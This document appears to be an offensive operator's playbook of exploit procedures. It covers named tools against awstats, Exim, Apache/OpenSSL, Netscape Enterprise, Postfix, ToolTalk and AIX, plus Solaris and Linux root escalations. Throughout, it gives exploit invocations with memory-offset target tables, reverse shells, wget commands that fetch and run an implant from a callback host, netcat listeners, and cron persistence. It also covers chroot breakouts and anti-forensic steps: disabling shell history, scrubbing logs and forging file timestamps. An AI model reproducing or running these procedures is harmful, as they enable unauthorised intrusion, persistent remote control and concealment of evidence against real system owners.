# jogswirl
-tunnel
l 80 TARGET_IP
r 5555
# vulnerable ?
-scan http TARGET_IP
# galeon http://127.0.0.1/cgi-bin/awstats.pl
Advanced Web Statistics 6.1 (build 1.704)
# ./xp_awstats.pl -i 127.0.0.1 -d /cgi-bin/awstats.pl -e 0 -c "uname -a;ls -la;w"
./xp_awstats.pl -i -d -e -c
-i <127.0.0.1>
-d
-p
-e 0: ?pluginmode=:system("CMD");
   1: ?configdir=|CMD|
   2: ?update=1&logfile=|CMD|&framename=mainright
-c
Examples:
1) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"uname -a;ls -la;w"
2) ./xp_awstats.pl -i http://127.0.0.1/cgi-bin/awstats.pl -e3 -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://PITCH_IP:5555/sendmail -Osendmail;chmod +x sendmail;D=-cPITCH_IP:9999 PATH=. sendmail) 2>/dev/null"
-nstun TARGET_IP:9999
###################### ERRGENTLE ##########################
# exploits vulnerability Exim 3.22 thru Exim 3.35 Mail Transfer Agent
# brute force
###### Version 3
# Upload on PITCHIMPAIR and run
netstat -an | grep LISTEN | grep 113
mkdir /tmp/.scsi
-cd /tmp/.scsi
-put /current/bin/xp-exim-3-remote-solaris-v3 x
-shell
./x -i TARGET_IP -p 25 -d SCAPEGOAT_DOMAIN -u nobody -t
# states if vulnerable; hit return to throw if vulnerable
# takes about 1000 hits; scrolls fast; will get root prompt
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
pwd
# will put you in /usr/exim-3.33/spool
PATH=. crond
exit
-rm /tmp/.scsi/x /tmp/.scsi
# check /var/log/messages for audit message or PAM failed attempt,
###### Version 2
-tunnel
l 25 TARGET_IP
r 113
r RANDOM_PORT
# test susceptibility:
-scan mail TARGET_IP
./xp-exim-3-v3 -i 555.1.2.150 -p 25 -t -d a.jetson.net -u nobody
./xp-exim-3 -i 127.0.0.1 -p 25 -c "sh &0 2>&0" -t
# response should be something like:
# It's vulnerable! Hit a key to start
# change location of heap to point to other location using -l:
./xp-exim-3 -i 127.0.0.1 -p 25 -t -l2 -c "sh &0 2>&0"
# or
(echo -e "HTTP/1.0 200\n";cat sendmail) | nc -vv -l -p RANDOM_PORT
# older versions of redhat cannot use /dev/tcp redirection, use wget;
./xp-exim-3 -i 127.0.0.1 -c "mkdir /tmp/.scsi; cd /tmp/.scsi; wget http://PITCH_IP:RANDOM_PORT/sendmail -osendmail;chmod +x sendmail*; PATH=. sendmail;PATH=. sendmail.1; PATH=. sendmail.2;"
## clean logs
# several entries in /usr/exim/spool/log/*
# with something like unqualified sender rejected
-lt /var/log/messages
-lt /var/log/maillog
-lt /usr/exim/spool/log
-tail /usr/exim/spool/log/rejectlog
-tail /usr/exim/spool/log/mainlog
############################################
# TOOLTALK -DEC, IRIX, or Sol2.6 or earlier
############################################
-scan rpc TARGET_IP
# look for 100083 1 tcp 30889 ttdbserverd
rpcinfo -n TTDBSERVERD_PORT -t TARGET_IP PROG_NUM
packrat pmgrd NETCAT_PORT
#ex:./dec_tt.tn.gr 1 200.21.200.2 LOCAL_IP 25 /tmp/.advtags 30889
./dec_tt.tn.gr 1 TARGET_IP LOCAL_IP NETCAT_PORT /tmp/WORK_DIR 30889
################################################
### VS - VIOLET
### You need to do this exploit from a box very close (ideally on the same net)
### as the target because of the traffic it generates.
### Reference the README file in /current/bin for help on the new version
################################################
#Start Xserver on local ops machine prior to logging in
### VS version5
xhost +
iptables -F
netstat -an |grep 6000 (make sure local xserver is listening)
### run the test version first to get the times (if vulnerable):
-put /current/bin/vs.gettime.sol.sparc v
rpcinfo -p TARGET_IP
#Ex: ./v -i 202.83.160.51 -h ATMNMS -n 34647 -p 443
./v -i TARGET_IP -h HOSTNAME -n TCP_PROGRAMPORT -p CALLBACK_PORT
### hit return when prompted; once you get the times for the cookie
### you can throw the attack thru the redirector
-rm v
-cd /tmp
-rm .scsi
### set up the tunnels, using whichever ports you think can call back:
-tunnel
l TCP_PROGRAMPORT TARGET_IP
r 8080 127.0.0.1 6000
r 443
### locally, send the exploit:
./vs.attack.linux -i 127.0.0.1 -h HOSTNAME -x 8080 -c PITCH_IP -p 443 -n TCP_PROGRAMPORT -7(optional) -v 5 -T SECOND_FROM_GETTIME -t MICROSECS_FROM_GETTIME
### a dtterm should eventually pop up - get that mouse outta the way; get those unsets ready!
###old way:
xhost +
iptables -F
netstat -an |grep 6000 (make sure local xserver is listening)
#connect to redir (you'll need two windows, one for the tunnel,
#one to run the exploit)
#create a working dir on redir
#upload nopen
#start nopen
#check if you'll need to elevate (hope to see superuser next to
# vs port):
rpcinfo targetIP (no options)
#prepare vs.sparc command or vs.linux (depending on OS of local
# box or redir box)
#upload vs.sparc executable to redir
#create tunnel in nopen redir window
r 22222 127.0.0.1 6000
#paste vs command into 2nd nopen window (on redir)
-shell ./vs.sparc -7 -v 5 -i IP -h name -D -q PITCH_IP -p tunnelport -n programport
#hit return when prompted and wait (possibly a long time)
#keep mouse/cursor away from area where window may pop up
#watch tcpdump window
#when dtterm pops up, paste each command:
w
df -k
#hit return on netcat window
#create another tunnel to netcat
r 32177
#in dtterm, paste upload command
#be sure to allow enough time for upload to get past redir and
# all the way to target
controlC netcat
#from redir, attempt to connect to target w/ nopen
#if successful, paste "exit" in dtterm
#If not, may have to start in callback mode
#paste upload commands
#./vs.linux -i target_ip -h hostname -r prog_num -v rpc_version -D -q local_ip -p 6000 -n ?
./vs.linux -i -h -D -q -p 6000 -v 5 -r -n 52213
#Misc ex:
./vs.linux -i 555.1.2.79 -h blade1000 -D -q 554.208.30.2 -p 6000 -v 5 -r 1289637086 -n 52213
mkdir /tmp/.scsi; cd /tmp/.scsi; telnet local_ip port
] [-u ] [-g ] [-n]
./eb
id
### start a new nopen as root:
PATH=. D="-l RANDOM" sendmail
-nstun TARGET_IP RANDOM
-rm eb mod32
#########################################################
# WALNUTSMOOTHY
#########################################################
# elevate to root: Sol 2.5.1-2.8
mkdir /tmp/1291aaab/
-put /current/up/efs f
cp f /tmp/1291aaab
-shell
cd /tmp/1291aaab
pwd
./f
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
cd /tmp/.scsi
head /etc/passwd
### start a new nopen as root while in -shell:
PATH=. D="-l RANDOM" sendmail
exit
### connect to privileged nopen:
-nstun TARGET_IP RANDOM
### burn unprivileged nopen
### cleanup files
-rm /tmp/1291aaab/f f sendmail
-rm /tmp/1291aaab
-lt /tmp
#########################################################
# EXTREMEPARR
#########################################################
# elevate to root: Sol 2.6-2.9
###
### make sure this exists:
-ls /usr/dt/bin/dtappgather
### Upload the proper version
-cd /tmp/.scsi
-put /current/up/exp.x.tar.Z b.tar.Z
uncompress b.tar.Z
tar -xf b.tar
### Find a setuid root program to use for the exploit
### The following should work:
### w, ps -ef, at -l, whodo, who, and ls -al
### Pick a program, determine the location, and verify setuid root is there
### (should see perms of -rwsr-xr-x)
which at
-ls /bin/at
### Verify su is NOT in the locale directory already
ls -al /usr/lib/locale/su
### Rename the shared object to have the name of 'su' or whichever locale you use instead
### Be sure you use the correct version for the system's architecture
cp su.so.2.789x su.so.2
-ls -t
### Have a copy of nopen in your working directory to start up once you get root:
-put /current/up/noserver sendmail
-ls
### Insert the local shared object /usr/lib/locale by running the following
### This will also generate itime commands to use later when cleaning up,
### normal error messages, and an indication of the success/failure of the
### insertion of the object into /usr/lib/locale
./exp su
echo "" | at now + 180 mins
### Set up your variables
-getenv
-setenv LC_TIME=su
-getenv
at -l
-shell
LC_TIME=su
export LC_TIME
at -l
id
pwd
cd /tmp/.scsi
PATH=. sendmail
exit
exit
### Connect from pitch to new noserver that has root privileges
-nstun TARGET_IP
### Burn your unprivileged nopen session and connect again to new noserver
-burn
-nstun TARGET_IP
### Cleanup
at -l
at -r 1085530072.a
at -l
ls -al /.sh_history
-ls -t /
ls -lart /usr/lib/locale
rm /usr/lib/locale/su/*
rmdir /usr/lib/locale/su
-lt /usr/lib/locale
ls -al /usr/lib | grep locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
chmod 755 /usr/lib/locale
chmod 755 /var/dt/appconfig/appmanager
chmod 755 /var/dt/appconfig
chown bin:bin /usr/lib/locale
chown root:root /var/dt/appconfig/appmanager /var/dt/appconfig
ls -al /usr/lib | grep locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
-touch /usr/lib/localedef /usr/lib/locale
-w
-ls -t
id
-w
-ls
-ls -t /usr/lib/locale
-ls -t /usr/lib/locale/iso_8859_1
-ls -t /usr/lib/locale/iso_8859_1/LC_CTYPE
-touch /usr/lib/locale/iso_8859_1 /usr/lib/locale/.
touch -r /usr/lib/locale/iso_8859_1 /usr/lib/locale/.
-ls -t /usr/lib/locale
ls -al /var/dt/appconfig | grep appmanager
ls -al /var/dt | grep appconfig
-ls -t /var/dt/
-ls -t /var/dt/appconfig
touch -r /var/dt/. /var/dt/appconfig/appmanager
touch -r /var/dt/. /var/dt/appconfig/.
-ls -t /var/dt/appconfig
-ls -t /var/dt/
### Clean up directory
-ls -t
-rm sendmail empty su.so.2 b.tar exp su.so.2.789x su.so.2.6x
-ls -t
### Check crontabs and logs if you used 'at'
-ls -t /var/adm
-ls -t /var/spool/cron
-ls -t /var/spool/cron/atjobs
touch -r /var/spool/cron/crontabs /var/spool/cron/atjobs
-tail -40 /var/cron/log
### Toast and sgrep your initial exploit
#######################################
### EVENTSTART
#######################################
### might reboot box on first try; after the reboot, it should work
### if you exploited an http service (like w/ EMBERSNOUT) make sure that
### service is started upon reboot; RH9.0 doesn't restart http by default
### unless the admin changed the config
### verify http is restarted at reboot:
-ls -t /etc/init.d
-ls -t /etc/rc.d/rc3.d
-ls /etc/rc.d/rc*.d/*htt*
chkconfig --list |grep htt
runlevel
### start a cron job to call nopen in case of a reboot (if you won't be able to reexploit)
### set the time to remove itself to the next hour (use both local and UTC time)
vi /current/down/crontab:
0,5,10,15,20,25,30,35,40,45,50,55 * * * * sh -c "D=-cPITCH_IP:PORT /tmp/.httpd-lock/crond"
0 1,17 * * * crontab -r
### on target:
date; date -u
-ls -t /var/log/cron
-ls -t /var/spool/cron
-cat /etc/syslog.conf
crontab -l
-put /current/down/crontab crontab
-cat crontab
crontab crontab
crontab -l
date
### upload eventstart:
-put /current/up/h h
-shell
unset HISTFILE
unset HISTFILESIZE
unset HISTSIZE
id
pwd
ls -l
PATH=. sendmail
exit
exit
### remove crontab after you elevate (or reboot - haha!)
crontab -r
#######################################
# PTRACE/FORKPTY
#######################################
### new exploit is ptrace-kmod; it's a kernel exploit, no suid needed.
### works on linux 2.2 -> 2.4, ex) RH8.0 and MDK 9.0
### might have to run it twice before it works.
### other ptraces are older and need to run against a setuid program that won't log
### like /usr/sbin/usernetctl, /usr/sbin/userhelper, or /usr/sbin/traceroute
# find / -fstype nfs -prune -o -type f \( -perm -4000 \) -user root -ls > o
# get o
#### get ptrace, forkpty, and nopen tarball ready to send:
cd /current/up
cp ptrace pt
cp noserver sendmail
cp forkpty fp
tar cvf 1u.tar pt sendmail fp
uuencode 1u.tar 1u.tar > 1u.tar.uu
nc -l -p NETCAT_PORT < 1u.tar.uu
#### to elevate and also get nopen there:
cd /tmp
mkdir .scsi
cd .scsi
telnet LOCAL_IP NETCAT_PORT > src
Connection closed by foreign host.
ls -la
uudecode src
ls -la
tar xvf 1u.tar
ls -la
chmod 700 fp sendmail pt
./fp
#### at sh-prompt, type:
tty
./pt
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
id
PATH=. sendmail
########################################
# TFTPD - upload image to router
########################################
### get on redirector with nopen
mkdir /tmp/.scsi
chmod 777 /tmp/.scsi
-cd /tmp/.scsi
-put ../up/tftpd_clean sched
### name the image EXACTLY how it will appear on the target - get tech guidance
-put image image.name
chmod 777 image.name
### start tftpd listener
#Example ./sched -l -a 10.0.0.14 -s /tmp/.scsi
# the -a IP option is the PITCH IP that talks to the router (if multiple interfaces)
-shell
./sched -l -a PITCH_IP -s /tmp/.scsi
DONE
exit
-rm image.name sched
-cd /tmp
-rm /tmp/.scsi
-lt
########################################
# SAMPLEMAN / ROUTER TOUCH
########################################
### redir
-tunnel l 2323 TARGET_IP 23
### Locally:
telnet 127.0.0.1 2323
# userid = <>
# passwd = <>
term length 0
sh user
sh ver
sh arp
sh ip rout
sh proc cpu
enable
# enable password = <>
sh run
sh start
sh cdp neighbo detail
sh flash all
# use the chart to figure out mem location for the next command if applicable
sh mem
logout
########################################
# ENGAGENAUGHTY
########################################
# Apache and SSL exploit on Linux on DEC Alpha
# ssl must be OpenSSL 0.9.6d or earlier
Usage: ./apache-ssl-linux-alpha <-i hostname> [-t arch] [-p port] [-n ] [-a 0x ]
  -t     target architecture (default is 00)
  -p     SSL port (default is 443)
  -a 0x  the free location found via objdump
  -n     open N apache connections before sending the shellcode (default is 20)
  -m     maximum number of open connections (default is 50)
  -v     verbose mode
  -c     command to run (default is "ls > /tmp/ls".)
Supported architectures:
  target archs:
  00 - RedHat Linux 7.0 Apache/1.3.12 (Unix) (Red Hat/Linux) mod_ssl/2.6.6 OpenSSL/0.9.5a
Examples:
  ./apache-ssl-linux-alpha -a 10 -v localhost
  ./apache-ssl-linux-alpha -p 1234 192.168.0.1 -n 40 -m 80
examples of commands:
  1. xterm: /usr/X11R6/bin/xterm -display 555.1.2.153:0 -e /bin/sh
  2. wget: First: echo -e "HTTP/1.0 200\n" > new; cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail; nc -v -l -p 53 < sendmail
     then: cd /tmp;wget http://555.1.2.153:53/sendmail; chmod +x /tmp/sendmail;PATH=/tmp sendmail;rm -f sendmail
  3. xinetd (watch for logging): echo -e "service squid\n{\nsocket_type = stream\nwait = no\nuser = apache\nserver = /bin/sh\n}" > /tmp/.scsi; /usr/sbin/xinetd -f /tmp/.scsi
scan ssl TARGET_IP
### scripted window
nc -l -vv -p RANDOM
-tunnel l 11443 TARGET_IP 443 r RANDOM
./apache-ssl-linux-alpha -i PITCH_IP -p SSL_PORT -v -c "(sh&0 2>&0)"
# or for ksh:
./apache-ssl-linux-alpha -i PITCH_IP -p SSL_PORT -v -c "(ksh -c "sh &0 2>&0")"
xhost +
-tunnel r 6006 127.0.0.1 6000
### This one pops back an xterm (be patient for it to pop back and keep mouse clear of window):
./apache-ssl-linux-alpha -i PITCH_IP -p SSL_PORT -v -c "/usr/bin/X11/xterm -display PITCH_IP:6 -e /bin/sh"
### Cleaning:
/var/log/httpd/error_log
############################################################################
# EXPLOITRETURN
# redflag 2.0 and redhat 9.0 running PHP
# found in cgi-bin for sybil build
-scan http TARGET_IP
HTTP/1.1 200 OK
Date: Wed, 25 Feb 2004 22:02:11 GMT
Server: Apache/1.3.12 (Unix) (Black Cat/Linux) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP/4.0.0 rus/PL29.4
-tunnel l 80 TARGET_IP
# choose 79, 5555
r 79 or r 5555
telnet 127.0.0.1 80
GET / HTTP/1.0
telnet 127.0.0.1 80
GET /ppd/product_user/reg_edu.php HTTP/1.0
# hit return twice
# response looking for: HTTP/1.1 302 Found
# do not use option 1 or 4 since it brings inconsistent results
xp_server
# uuencoded rat
uuencode sendmail sendmail > sendmail.uu
nc -l -v -p 79 < sendmail.uu
./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n79 -t3
or
# no uuencode of rat
nc -l -v -p 5555 < sendmail
./xp_serial -i127.0.0.1 -p80 -d"/ppd/product_user/reg_edu.php" -l PITCH_IP -n5555 -t2
# after rat upload, nc command
-nstun TARGET_IP
# will be nobody - need to elevate with ptrace or other
# need to clean the following logs
/var/log/httpd/error_log
/var/log/httpd/access_log
#####################################################
# EGGBASKET
#####################################################
# Remote exploit against the Netscape Web Server which leverages
# a buffer overflow to obtain remote access
# Netscape Enterprise/3.6 and Netscape Enterprise/3.6 SP1
# works against AIMC Netscape servers also with right versions
# Netscape-Enterprise 3.6:
#   solaris 2.6 (sun4m only), sun4u & sun4m solaris 2.7 - 2.9
# Netscape-Enterprise/3.6 SP1:
#   sun4m solaris 2.8, sun4m & sun4u solaris 2.9
# need local to elevate such as SMOOTHY and EXTREMEPARR
# Verify version of Netscape if target did not change version string
-scan http TARGET_IP
# from redirector
-tunnel l 80 TARGET_IP
# locally
nc 127.0.0.1 80
GET / HTTP/1.0
# on redirector
-tunnel l 80 TARGET_IP r RANDOM_HIGH_PORT1
# locally window1
nc -vv -l -p RANDOM_HIGH_PORT1
# Usage: xp_ns-httpd
# i7 - program counter, location we are jumping to; fp - stack location; o4 - where our code is
Targets:                                                        i7          fp          o4
Version: 01: Netscape-Enterprise/3.6/sun4u/5.8/fire115/aimc     0xff2a2a74  0xff2e6270  0x13ab60
Version: 02: Netscape-Enterprise/3.6/sun4m/5.8/theora/aimc      0xef722a74  0xef766270  0x13a360
Version: 03: Netscape-Enterprise/3.6/sun4m/5.8/unixtest-4/aimc  0xef6e2a74  0xef726270  0x13a060
Version: 04: Netscape-Enterprise/3.6/sun4u/5.8/unixtest-1/aimc  0xff2a2a74  0xff2e6270  0x13a160
Version: 05: Netscape-Enterprise/3.6/sun4u/5.8/fire121/aimc     0xff2a2a74  0xff2e6270  0x13ab60
Version: 06: Netscape-Enterprise/3.6/sun4m/5.8/arc/aimc         0xef6e2a74  0xef726270  0x139d60
Version: 07: Netscape-Enterprise/3.6/sun4u/5.7/baltimore/aimc   0xff2a2a74  0xff2e6270  0x13a360
Version: 08: Netscape-Enterprise/3.6/sun4u/5.7/grandmama/aimc   0xff2a2a74  0xff2e6270  0x13a260
Version: 09: Netscape-Enterprise/3.6/sun4m/5.7/unixtest-3/aimc  0xef722a74  0xef766270  0x139360
Version: 10: Netscape-Enterprise/3.6/sun4m/5.6/elsa/aimc        0xef722a74  0xef766270  0x13a060
Version: 11: Netscape-Enterprise/3.6/sun4m/5.6/gazoo/aimc       0xef722a74  0xef766270  0x13a060
Version: 12: Netscape-Enterprise/3.6/sun4m/5.6/loneranger/aimc  0xef722a74  0xef766270  0x139360
Version: 13: Netscape-Enterprise/3.6/sun4u/5.9/fire108/aimc     0xff2a2a74  0xff2e6270  0x139f60
Version: 14: Netscape-Enterprise/3.6/sun4m/5.9/mack/aimc        0xef6e2a74  0xef726270  0x139d60
Version: 15: Netscape-Enterprise/3.6/sun4u/5.9/thing/aimc       0xff2a2a74  0xff2e6270  0x139f60
Version: 16: Netscape-Enterprise/3.6/sun4u/5.9/thing            0xff2a2a74  0xff2e6270  0x155090
Version: 17: Netscape-Enterprise/3.6/sun4u/5.9/fire117          0xff2a2a74  0xff2e6270  0x155090
Version: 18: Netscape-Enterprise/3.6/sun4m/5.6/loneranger       0xef722a74  0xef766270  0x153f78
Version: 19: Netscape-Enterprise/3.6/sun4u/5.9/thing            0xff2a2a74  0xff2e6270  0x155290
Version: 19: Netscape-Enterprise/3.6/sun4u/5.8/blade1000        0xff2a2a74  0xff2e6270  0x155f90
Version: 20: Netscape-Enterprise/3.6sp1/sun4u/5.9/thing         0xff2a2c64  0xff2e6750  0x155390
Version: 21: Netscape-Enterprise/3.6sp1/sun4m/5.8/theora        0xef722c64  0xef766750  0x155390
Version: 22: Netscape-Enterprise/3.6sp1/sun4m/5.9/mack          0xef6e2c64  0xef726750  0x155090
# -f webpath: usually just /
# -c command: "(ksh -c \"sh &0 2>&0\")&"
# -7 i7: have seen 0xff2a2a74, 0xef722a74, 0xef6e2a74
# -6 sp: these work 0xff2e6270, 0xef766270, 0xef726270
# -4 o4: have seen 0x153090; when running AIMC, use 0x139360
# -d destination target
# -p port
# -s sleep number of seconds between requests
# -h usage
# -x range in the heap
# -i heap increment; another good one to try is 0x80
# locally window2
# Example 1 assumes default install:
Example 1:
xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -d 127.0.0.1 -p 80
# Example 2, Netscape was installed with AIMC:
Example 2, AIMC box:
xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -d 127.0.0.1 -p 80 -4 0x139360 -s 10 -x 64
Example 3, low level mode:
xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -7 0xff2a2a74 -6 0xff2e6270 -d 127.0.0.1 -p 80 -4 0x13a960 -s 10 -x 16
# Example 4, Netscape 3.6 SP1:
Example 4, SP1:
xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -7 0xff2a2c64 -6 0xff2e6750 -d 127.0.0.1 -p 80
# Example 5, a busy Netscape 3.6 SP1:
Example 5: retry, but faster and more complete:
xp_ns-httpd -f / -c "(ksh -c \"sh &0 2>&0\")&" -d 127.0.0.1 -s 5 -i 0x80
# Give troubleshooting instructions:
# There are five steps in troubleshooting EGGBASKET v2:
# Determine if the webserver is running Netscape-Enterprise 3.6 or 3.6 SP1.
#   nc 127.0.0.1 80
#   GET / HTTP/1.0
# Determine the OS based upon touch information or MAC address.
# Maybe the server is busy serving requests, therefore try the
# following additional options: -s 5 -i 0x80
# Maybe try a wider range in hitting the NOP sled, then try the
# following additional options:
#   -x 64 -4 0x139360   # AIMC
#   or
#   -x 64 -4 0x153090   # Normal install
# Is the target running the AIMC version, then try the following additional option: -4 0x139360
# The line "Errorlog" in $SERVERROOTDIR/config/magnus.conf tells where logging
# occurs
# If the exploit fails, it is logged as such:
# [18/Mar/2002:08:59:38] info (23834): successful server startup
# [18/Mar/2002:08:59:38] info (23834): Netscape-Enterprise/3.6 SP1 B99.036.2117
# [18/Mar/2002:08:59:38] verbose (23834): livewireInit reports: Starting Server-Side JavaScript build: 99.036.2332
###################### EXCEEDSALON-AIX #####################
## local elevation for AIX
## does not log but check anyway
# elevation as user
mkdir /tmp/.pci
cd /tmp/.pci
# use ftshell, uudecode copy/paste, telnet/nc, or wget to put
# /current/up/xp_lquerypv-aix5.1 up as s
./s
# elevation in nopen
mkdir /tmp/.pci
-cd /tmp/.pci
-put /current/up/xp_lquerypv-aix5.1 s
-shell
id        (user)
./s
id        (euid=root)
./sendmail /tmp/exit
###################### ESTOPFORBADE #####################
# local root elevation against gds_inet_server under
# Cobalt Linux release 6.0
# for complexpuzzle
# on target from nopen
-lt /usr/local/sbin/gds_inet_server
mkdir /tmp/.pci
-cd /tmp/.pci
pwd
-put /current/up/xp_gds_inet_server g
-shell
id
./g
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
id
# try up to 2 times for elevation
#####################################################
# ENTERSEED
#####################################################
#
# Apparently, 30 or so minutes and you can bail...no joy.
#
## Set up redirector
-tunnel l 2500 TARGET_IP 25 r NETCAT_PORT 127.0.0.1 NETCAT_PORT
## set up a netcat listener in a local scripted window
## to upload a STATICALLY COMPILED NOPEN
nc -l -v -p NETCAT_PORT < noserver-static
## LOCALLY in another window: OPTIONAL: Alert to show we hit
while [ 1 ] ; do netstat -an | grep NETCAT_PORT.*LISTEN || break ; sleep 2 ; done ; beeps 3333
## run exploit in a local scripted window
#Usage: ./enterseed.py [-search] [-u] [-fuploaded-filename]
#Platforms 1: SuSE 9.0 RPM (postfix-2.0.14-41)
#          2: SuSE 9.1 RPM (postfix-2.0.19_20040312-11)
#          3: ASP Linux 9 RPM (postfix-2.0.8-1asp)
# NOTE: THERE ARE OTHERS BEYOND 3....6 is Debian 3.1 for instance....
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 1
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 1 -uroot@TARGET_IP
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 2
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 2 -uroot@TARGET_IP
./enterseed.py 127.0.0.1 2500 PITCH_IP NETCAT_PORT 3 -uroot@TARGET_IP -search1
## once the exploit calls back and nopen uploaded connect to noserver
-nstun TARGET_IP
## check to see if you are chroot'd
-lt /
## if it looks like
#drwx------   2 postfix root      4096 Apr 27 04:35 2003 corrupt
#drwx-wx---   2 postfix postdrop  4096 Apr 27 04:35 2003 maildrop
#drwx------   2 postfix root      4096 Apr 27 04:35 2003 saved
#drwxr-xr-x   3 root    root      4096 Nov 17 07:22 2004 usr
#drwxr-xr-x  18 root    root      4096 Nov 17 07:22 2004 .
#drwxr-xr-x   2 root    root      4096 Nov 17 07:22 2004 lib
#drwx------   2 postfix root      4096 Nov 17 07:22 2004 hold
#drwxr-xr-x  26 root    root      4096 Nov 17 07:36 2004 ..
#drwxr-xr-x   2 root    root      4096 Nov 18 12:54 2004 etc
#drwx------  18 postfix root      4096 Nov 18 14:50 2004 active
#drwx------  18 postfix root      4096 Nov 18 14:50 2004 bounce
#drwx------  18 postfix root      4096 Dec  1 12:37 2004 deferred
#drwx------   3 postfix root      4096 Dec  1 14:53 2004 flush
#drwxr-xr-x   2 root    root      4096 Dec  1 14:53 2004 pid
#drwx------  15 postfix root      4096 Dec  8 14:00 2004 defer
#drwx------   2 postfix root      4096 Mar  4 15:34 2005 private
#drwx--x---   2 postfix postdrop  4096 Mar  4 15:34 2005 public
#drwxrwxrwx  19 postfix root      4096 Mar  7 11:36 2005 incoming
## this means you are in a chrooted environment without any binaries
## (no ls, netstat, ps, which, w, ...)
## IF NOT CHROOTED, continue to clean logs
## IF CHROOTED
-cd incoming
-put /current/up/h h
-put /current/up/b b
-put /current/up/s s
-put /current/up/noserver ncd
## change permissions
./s h
./s b
./s ncd
./s .
## run break chroot routines
./h
## you should be able to connect to a new nopen running
-nstun TARGET_IP 32755
## CLEANUP
## the location of the chrooted environment was /var/spool/postfix/
-lt /var/spool/postfix/
-lt /var/spool/postfix/incoming
-rm b h s ncd a..
## CLEAN LOGS
## check logs
/var/log/mail*
/var/adm/mail*
/var/log/messages
/var/adm/messages
grep "stripping too many comments" /var/adm/mail*
grep "stripping too many comments" /var/log/mail*
grep "signal 11" /var/log/mail*
grep "signal 11" /var/adm/mail*
grep "bogus file" /var/adm/mail*
grep "bogus file" /var/log/mail*
grep "writable by everyone" /var/adm/mail*
grep "writable by everyone" /var/log/mail*
grep PITCH_IP /var/log/messages
grep PITCH_IP /var/adm/messages
## if any of the directories or files were changed to world writable
## change them back because postfix will panic
chmod PREV_PERM /var/spool/postfix/incoming
########################################
# Exploits a vulnerability in the Postfix mail server.
# Postfix runs on FreeBSD, Linux, Solaris, and most Unix servers.
# This exploit works for the default binary packages in SuSE 9.0-9.2, ASP Linux 9, and Debian 3.1
# must elevate to get root
# postfix 2.0.14-41 on SuSE 9.0
# postfix 2.0.19_20040312-11 on SuSE 9.1
# postfix-2.0.8-1asp on ASP Linux 9
# postfix-2.1.5 on SuSE 9.2
# postfix-2.1.5 on Debian 3.1
#
# ENTERSEED expects the DUL Encoder to be in its current directory, as well
# as write permission to that directory.
#
# In the event of a chroot'ed environment, shared libraries will not be usable.
# Any uploaded files (such as noserver) must be statically compiled.
#
# -tunnel
# r NETCAT_PORT
# l RANDOM TARGET_IP TARGET_PORT
./enterseed.py 127.0.0.1 RANDOM PITCH_IP NETCAT_PORT [-search] [-u] [-f]
# Usage: ./enterseed.py [-search] [-u] [-f]
# Platforms 1: SuSE 9.0 RPM (postfix-2.0.14-41) from short hostname (0-19 chars)
#           2: SuSE 9.0 RPM (postfix-2.0.14-41) from long hostname (17-43 chars)
#           3: SuSE 9.1 RPM (postfix-2.0.19_20040312-11) from long hostname (17-43 chars)
#           4: ASP Linux 9 RPM (postfix-2.0.8-1asp) from long hostname (17-43 chars)
#           5: SuSE 9.2 RPM (postfix-2.1.5)
#           6: Debian 3.1 (sarge) DEB (postfix-2.1.5)
#
#
# Chroot Example:
#
# Begin like above. Once connected with noclient, -cd to incoming and upload the statically compiled
# EVENTSTART, the breakchroot program, and the setperms program (for this example, these
# binaries are named h, b, and s, respectively. Since EVENTSTART is unable to take command-line
# arguments or environment variables, h expects breakchroot to be named "b" and breakchroot
# expects noserver to be named "ncd". The names are all configurable, but require a recompile.
# Be sure to compile statically!)
#
# After uploading, use s to set the permissions on b, ncd and the current directory:
# (remote)$ ./s b
# (remote)$ ./s ncd
# (remote)$ ./s .
# These files should all be set to mode 777 now.
#
# Now run EVENTSTART:
# (remote)$ ./h
# EVENTSTART will execute b (the breakchroot program) with root privileges, which will in turn break
# out of the chroot and exec ncd (noserver) from the root directory and with root privileges.
# The breakchroot program creates a directory "a.." while breaking chroot. Remember to delete
# this directory as well!
# Now connect to the new noserver:
# (local)$ ./noclient 555.1.11.25:32755
# (remote)# id
# uid=0(root) gid=0(root) groups=0(root)
# (remote)# pwd
# /
#
# Make sure to delete all uploaded files/directories and reset directory permissions!
#
# Troubleshooting:
# If EVENTSTART fails and says something like "No such file or directory" make sure all binaries
# have been statically compiled.
# If EVENTSTART fails and says something like "Permission denied" make sure all binaries are set
# to mode 777. If not, use the setperms program (s).
#####################################################
# EMPTYBOWL
#####################################################
# vulnerability in MailCenter Gateway (mcgate) - an application that comes
# with Asia Info Message Center mailserver; buffer overflow allows a string
# passed to popen() call to be controlled by an attacker; arbitrary cmd execute
# known to work only for AIMC Version 2.9.5.1
# may get one shot only and then server will crash
# works on solaris 2.6-2.10
# test - fire115
# make sure not windows target running 3389 but unix target
-scan mail TARGET_IP
-scan 3389 TARGET_IP
# Usage: ./emptybowl.py
# --NOTE: All spaces in cmd-string will be replaced by \t's
# on redirector
-tunnel l 3389 TARGET_ip r LOW_PORT_1 r LOW_PORT_2
# local may be needed to elevate privileges
# DO NOT use the command below, since only have 1 shot at target
